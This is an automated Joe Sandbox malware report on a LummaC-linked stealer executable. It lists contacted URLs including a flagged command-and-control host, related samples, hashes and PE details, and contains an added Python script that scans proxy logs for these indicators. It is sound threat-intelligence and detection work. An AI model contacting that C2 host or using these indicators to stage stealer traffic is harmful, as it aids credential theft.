                                                                                                                            https://steamcommunity.com/my/wishlist/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://help.steampowered.com/en/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/market/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/news/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://store.steampowered.com/subscriber_agreement/k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgk7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/discussions/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/stats/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&ak7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/steam_refunds/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://x1.c.lencr.org/0k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://x1.i.lencr.org/0k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchk7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&ak7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=ek7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/workshop/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allk7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_ck7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/legal/k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.mozilla.ork7T6akLcAr.exe, 00000000.00000003.2307679456.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engk7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/api?k7T6akLcAr.exe, 00000000.00000003.2388617851.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392347427.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icok7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://store.steampowered.com/
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://lev-tolstoi.com/api9
    Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: malware
    Reputation: unknown
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
    Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://lev-tolstoi.com/api3
    Source: k7T6akLcAr.exe, 00000000.00000003.2283743192.000000000558A000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Antivirus detection: Avira URL Cloud: malware
    Reputation: unknown
https://ac.ecosia.org/autocomplete?q=
    Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
    Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
http://crt.rootca1.amazontrust.com/rootca1.cer0?
    Source: k7T6akLcAr.exe, 00000000.00000003.2284289746.00000000055AD000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
http://store.steampowered.com/account/cookiepreferences/
    Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://store.steampowered.com/mobile
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://steamcommunity.com/
    Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp; k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp
    Malicious: false
    Reputation: high
IP              | Domain             | Country       | ASN   | ASN Name         | Malicious
172.67.157.254  | lev-tolstoi.com    | United States | 13335 | CLOUDFLARENET US | false
23.55.153.106   | steamcommunity.com | United States | 20940 | AKAMAI-ASN1 EU   | false
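The two contacted addresses above both sit in large CDN networks (AS13335 CLOUDFLARENET and AS20940 AKAMAI-ASN1), so an IP on its own identifies an edge node shared with many unrelated sites rather than this sample's infrastructure; the usable indicators are the host name lev-tolstoi.com and the /api paths that Avira URL Cloud flagged in the URL table. The following script is an added example, not part of the Joe Sandbox report: it matches those indicators against proxy-log lines and grades a bare IP hit as low confidence. The log format, the client IPs and the host example-tenant.com are constructed for the example; only the two domains, the two destination IPs and the /api prefix come from the report.

```python
# Added example (not from the Joe Sandbox report): grade proxy-log lines against
# the report's network IOCs. Log lines, client IPs and example-tenant.com are constructed.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# From the report's URL table: lev-tolstoi.com/api* is what Avira URL Cloud flagged as malware.
C2_DOMAINS = {"lev-tolstoi.com"}
C2_PATH_PREFIX = "/api"

# From the report's IP table. Both addresses belong to CDN ASNs
# (13335 CLOUDFLARENET, 20940 AKAMAI-ASN1) that front many unrelated sites.
CDN_EDGE_IPS = {
    "172.67.157.254": "lev-tolstoi.com via AS13335 CLOUDFLARENET",
    "23.55.153.106": "steamcommunity.com via AS20940 AKAMAI-ASN1",
}

# Constructed log format: "<timestamp> <client_ip> <dst_ip> <method> <target> <status>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")
# Accepts an absolute URL or a CONNECT-style "host:port" target.
URL_RE = re.compile(r"^(?:https?://)?([^/:]+)(?::\d+)?(/[^ ]*)?$", re.IGNORECASE)


@dataclass
class Hit:
    line_no: int
    severity: str  # "high", "medium" or "low"
    reason: str


def split_target(target: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (host, path). A CONNECT target carries no path, so path stays None
    rather than being assumed to be '/'; an absolute URL without a path gets '/'."""
    m = URL_RE.match(target)
    if not m:
        return None, None
    host = m.group(1).lower()
    path = m.group(2)
    if path is None and target.lower().startswith(("http://", "https://")):
        path = "/"
    return host, path


def classify(line_no: int, client: str, dst_ip: str, method: str, target: str) -> Optional[Hit]:
    host, path = split_target(target)
    if host is None:
        return None
    if host in C2_DOMAINS:
        # The host is the strong signal; the path refines it when the proxy saw it.
        if path is not None and path.startswith(C2_PATH_PREFIX):
            return Hit(line_no, "high", f"{client} {method} {host}{path} matches C2 URL")
        return Hit(line_no, "medium", f"{client} {method} {host} matches C2 domain (path not visible)")
    if dst_ip in CDN_EDGE_IPS:
        # IP-only match: the edge is shared with other tenants, so this is a lead, not a verdict.
        return Hit(line_no, "low",
                   f"{client} -> {dst_ip} ({CDN_EDGE_IPS[dst_ip]}) but host is {host}; "
                   "match on host/SNI, not on IP")
    return None


def scan(log_text: str) -> List[Hit]:
    """Run classify() over every well-formed line; malformed lines are skipped."""
    hits: List[Hit] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, client, dst_ip, method, target, _status = m.groups()
        hit = classify(line_no, client, dst_ip, method, target)
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed sample log. Only lev-tolstoi.com, steamcommunity.com and the two
# destination IPs come from the report; everything else is made up for the example.
SAMPLE_LOG = """\
2024-12-28T08:40:12Z 10.0.0.15 172.67.157.254 POST https://lev-tolstoi.com/api 200
2024-12-28T08:40:13Z 10.0.0.15 172.67.157.254 CONNECT lev-tolstoi.com:443 200
2024-12-28T08:40:14Z 10.0.0.15 23.55.153.106 GET https://steamcommunity.com/ 200
2024-12-28T08:41:02Z 10.0.0.22 172.67.157.254 GET https://example-tenant.com/ 200
2024-12-28T08:41:40Z 10.0.0.22 203.0.113.5 GET https://example.com/ 200
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.severity}: {hit.reason}")
```

On the constructed log the first line (POST to lev-tolstoi.com/api) is graded high, the CONNECT to lev-tolstoi.com:443 medium because the proxy never saw a path, and the two connections to the shared edge IPs low; the fourth line shows why an IP-only block list would also catch an unrelated site hosted behind the same Cloudflare address.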
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581595
Start date and time: 2024-12-28 09:39:42 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: k7T6akLcAr.exe (renamed because the original name is a hash value)
Original Sample Name: fccb91d8f4ef18da22c21583c82c56c0.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information: Failed
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                              • Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 172.202.163.200
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target k7T6akLcAr.exe, PID 6032, because there are no executed functions
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time     | Type            | Description
03:40:36 | API Interceptor | 18x Sleep call for process: k7T6akLcAr.exe modified
Match           | Associated Sample Name / URL | Detection | Threat Name
172.67.157.254  | hx0wBsOjkQ.exe               | malicious | LummaC
172.67.157.254  | fnnGMmd8eJ.exe               | malicious | LummaC
172.67.157.254  | IzDjbVdHha.exe               | malicious | LummaC
172.67.157.254  | T4qO1i2Jav.exe               | malicious | LummaC Stealer
172.67.157.254  | k0ukcEH.exe                  | malicious | LummaC
172.67.157.254  | pVbAZEFIpI.exe               | malicious | LummaC
172.67.157.254  | MaZjv5XeQi.exe               | malicious | LummaC
172.67.157.254  | jT7sgjdTea.exe               | malicious | LummaC
172.67.157.254  | Y4svWfRK1L.exe               | malicious | LummaC
172.67.157.254  | YKri2nEBWE.exe               | malicious | LummaC
23.55.153.106   | SPzPNCzcCy.exe               | malicious | LummaC
23.55.153.106   | hx0wBsOjkQ.exe               | malicious | LummaC
23.55.153.106   | MrIOYC1Pns.exe               | malicious | LummaC
23.55.153.106   | fnnGMmd8eJ.exe               | malicious | LummaC
23.55.153.106   | PW6pjyv02h.exe               | malicious | LummaC
23.55.153.106   | Solara-v3.0.exe              | malicious | LummaC
23.55.153.106   | Script.exe                   | malicious | LummaC
23.55.153.106   | Neverlose.cc-unpadded.exe    | malicious | LummaC
23.55.153.106   | Aura.exe                     | malicious | LummaC
23.55.153.106   | Aura.exe                     | malicious | LummaC
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
lev-tolstoi.com | SPzPNCzcCy.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | hx0wBsOjkQ.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
lev-tolstoi.com | fnnGMmd8eJ.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
lev-tolstoi.com | Solara-v3.0.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | Script.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | Aura.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | Installer.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | SoftWare(1).exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | ForcesLangi.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
lev-tolstoi.com | Leside-.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
steamcommunity.com | SPzPNCzcCy.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | hx0wBsOjkQ.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | MrIOYC1Pns.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | fnnGMmd8eJ.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | PW6pjyv02h.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | Solara-v3.0.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | Script.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | Neverlose.cc-unpadded.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | Aura.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
steamcommunity.com | Aura.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AKAMAI-ASN1EU | SPzPNCzcCy.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | hx0wBsOjkQ.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | MrIOYC1Pns.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | fnnGMmd8eJ.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | PW6pjyv02h.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | Solara-v3.0.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | Script.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | Neverlose.cc-unpadded.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | Aura.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
AKAMAI-ASN1EU | Aura.exe | Get hash | malicious | LummaC | Browse | 23.55.153.106
CLOUDFLARENETUS | SPzPNCzcCy.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
CLOUDFLARENETUS | es5qBEFupj.exe | Get hash | malicious | LummaC | Browse | 172.67.128.184
CLOUDFLARENETUS | vUcZzNWkKc.exe | Get hash | malicious | LummaC | Browse | 172.67.128.184
CLOUDFLARENETUS | CLaYpUL3zw.exe | Get hash | malicious | LummaC | Browse | 172.67.128.184
CLOUDFLARENETUS | hx0wBsOjkQ.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
CLOUDFLARENETUS | fnnGMmd8eJ.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254
CLOUDFLARENETUS | lumma.ps1 | Get hash | malicious | LummaC | Browse | 172.67.167.249
CLOUDFLARENETUS | BagsThroat.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.80.1
CLOUDFLARENETUS | ronwod.exe | Get hash | malicious | LummaC | Browse | 104.21.92.219
CLOUDFLARENETUS | ronwod.exe | Get hash | malicious | LummaC | Browse | 172.67.198.222
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | SPzPNCzcCy.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | es5qBEFupj.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | vUcZzNWkKc.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | CLaYpUL3zw.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | hx0wBsOjkQ.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | MrIOYC1Pns.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | fnnGMmd8eJ.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | PW6pjyv02h.exe | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | lumma.ps1 | Get hash | malicious | LummaC | Browse | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | BagsThroat.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.157.254, 23.55.153.106
                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.530740868343317
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: k7T6akLcAr.exe
File size: 2'951'680 bytes
MD5: fccb91d8f4ef18da22c21583c82c56c0
SHA1: 8c102cc60221c9fc5d83b84c86f70f735d3e8214
SHA256: b98dde6aa8a1e509e9def76dbfc5da5518b52d0b23abbba5525fd7739b8e605b
SHA512: 703bf1106f7ad56a46d100aeaaf5fea60a80cbb9119abef872d0749fb30ff5c1aea4c0a05000fa5184c9a279822b6ffa82785cdb1c27fc6ca7515f5526ad43ac
SSDEEP: 49152:At2oFOooQkx0AfUF72iyzi+jcNjSFl/aAVKbEcx2oJuQ:6FOooQkx0AfUF72iAD45SFlCAVKl2op
TLSH: E4D53AA2A50562CFD88E1774542BDD82695D07F98F2048C79C2DF4BEBDB3DC121BAE24
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@...........................0.....dv-...@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x6fd000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                      add byte ptr [eax], al
